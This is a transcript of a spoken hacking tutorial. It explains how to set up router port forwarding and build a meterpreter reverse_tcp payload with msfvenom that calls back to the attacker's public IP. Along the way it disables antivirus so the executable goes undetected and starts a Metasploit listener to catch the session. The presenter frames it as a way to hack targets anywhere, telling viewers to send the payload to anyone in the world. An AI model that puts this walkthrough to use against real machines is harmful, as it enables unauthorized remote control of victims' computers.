Hello everybody and welcome back to this tutorial. And what we're going to do right now is we're going to take a look at how we can actually create payload and use it in order to hack targets over the internet. So in order for us to do that, we need to actually perform some kind of action which is called port forwarding. Now what port forwarding is basically forwarding a port on your router. Take any incoming connections from a specific port directly to your own machine. So for example, you forward the port 4444 on your router, and every time router receives an actual connection or packets or basically anything to that specific port, it will automatically transfer it right back to your machine. Therefore, it allows us to actually perform the reverse shell connections over the internet. For example, you want to hack a target that is in a different country, you are able to do that using the port forwarding. Now the only problem with this is that you actually need an actual access to the router in order to forward the port. First of all, what we're going to do is we're going to open up our Firefox, and in case you don't know how you can access your router, you can simply just open up your terminal in your Kali Linux machine. Right now, in order to find out what is the IP address of your gateway or your router, you can simply just type netstat-nr. And this will actually retrieve the IP address of your gateway. As you can see, under the gateway row is the actual IP address. So you can simply just copy that, go back to your Firefox and paste that IP address right into the search bar. And since I don't have any proxy, it will ask me for the actual username and password to my router. Now you need to know the username and password. If you haven't changed it, it is probably default, or basically it is probably something like admin or admin password, and you can search the default passwords for the router simply just by typing in the actual name of your router into the Google, and it will give you the default password for that specific router. In my case, I will type in the username and password for my actual router, and right here what this will do, as soon as you type in the username and password, it will actually lead you to a page with router settings where you can actually change different things. And what we are interested in is finding the port forwarding settings, and there to specify a port to be forwarded to our actual Kali Linux machine. Here it is. Okay, so I loaded my router, and as you can see, this is an actual old router, so there is not much of a settings. Your router will probably look a lot different than this one. Your router will probably have a lot more options than this, so make sure that you find the actual port forward settings. In my case, that is over basic and then NAT, and right here I have an option called port forwarding, and you should have something similar to that. And right here we have to set up a few things in order to actually forward a port to our Kali Linux machine. But before we do any of that, we need to find out what is the IP address of our Kali Linux machine. So go back to your Kali Linux, type ifconfig, and in my case it is 192.168.1.7. So we want to forward the incoming connections to this IP address. Now if you're doing this for longer period of time, you want to make sure that the IP address of your Kali Linux machine is static and it doesn't change, because if you forward the port right now to the actual IP address of 192.168.1.7 and then tomorrow you restart your Kali Linux machine and you get a different IP address, the connections will not longer work. Okay, so go back right here. Let me see what I want to do. This is not really interesting to us. Protocol, set TCP protocol, start port number, and here basically you set up the actual port number that you want to port forward to. In my case, let us just type 7777. The end port number should be the same, so 7777. The local IP address is the actual IP address that you want to forward the packets to from the router, so it is the IP address of your Kali Linux machine. So type here 192.168.1.7 or whatever the IP address of your Kali Linux machine is. And in the start port local and end port local, you can type the same actual port numbers as you did for the start port and end port number. Now, once again, the actual settings to your port forwarding should be, well, not should be, they are probably going to be different. So if you don't know what you're doing, you can simply just consult with Google and type how to port forward on that specific router. As you can see, you will get the name of the router, and then you can just paste it into the Google and see how you can set up the port forwarding. Okay, so once you actually set everything up, I will just click here submit, and it should add the actual port forward rule to the list right here, as we can see right here. So TCP 7777 on the IP address of 192.168.1.7, so everything is good to go. Okay, but now another thing that we need to take a look at is how we can actually make a connection to our Kali Linux machine from outside of our local area network. So what we did for now is we only connected to the local IP address. So for example, in our payload creation, we only specified the local IP address and we never specified anything else. But we know that this actual IP address right here will not work outside of our actual local area network. So someone from, for example, China will not be able to connect back to us using this IP address. That's why we set up a port forwarding rule, and now in the MSF Venom payload creation, we need to specify the lhost option to be equal to our global IP address. And we're going to take a look at how we can do that right now. What we need to do is we need to actually navigate to our Firefox and type what is my IP. Here it is. It is loading up. So I typed in what is my IP address in the search bar in order to find out my public or global IP address right here. Just click on any page right here and you will be able to see your global IP address. Or you can simply just see it right here. So I can copy it. Now I copied my global IP address and now I'm going to create the MSF Venom payload. So MSF Venom payload is going to be Windows x64 meterpreter reverse underscore TCP. lhost is going to be equal to this IP address that I just copied. lhost equals and then paste the actual IP address, and lport should be equal to the actual local port that you specified in your port forwarding rule. So in my case, it specified 7777. Therefore, I will specify in the MSF Venom payload creation the same port. Okay, and the next thing is file to be exe and output to be port forward.exe. Okay, so this will create the payload for us. And what we are going to do is, first of all, I'm going to plug in my USB drive just to see whether it works. We are not really going to perform anything else. We just want to see whether we are going to be able to actually get the connection back from our target. But before I do any of that, I want to make sure that my actual payload doesn't get detected, so I need to turn off my virus protection. No, I don't want to turn it on. I want to manage settings and turn this off. Click here, yes. And we should be good to go. So right now I'm going to copy the port forward to my USB drive. Okay, so right now, once I copied it, I can start the MSF console right here. Unplug the USB drive, go right here, port forward.exe, paste it onto the desktop, set up our listener first, so here it is, use exploit multi-handler, and right now you want to set the payload to be the same payload from the MSF Venom. And this can be a little bit confusing right here. Once you actually set up the options, so you have the options to set up the lhost and lport, you want to set up the actual local IP address. So you want to listen onto your local IP address. And lport should be 7777. And right now you can start the exploit. As we can see, we are listening on this IP address at this port, and right now if we simply just run this actual payload, we will get the Meterpreter session 1 opened. As we can see, we can actually execute commands and get UID simply just gave us the output of the machine that we actually managed to hack. Basically, what we saw right here is how we can actually hack a machine over the internet. So you simply just send this payload to anyone in the entire world and they will be able to actually connect back to your target machine, or pardon me, to your Kali Linux machine, and you will be able to execute commands on that system. So basically that will be about it for this tutorial. I hope you enjoyed it and I hope I will see you in the next one. Bye!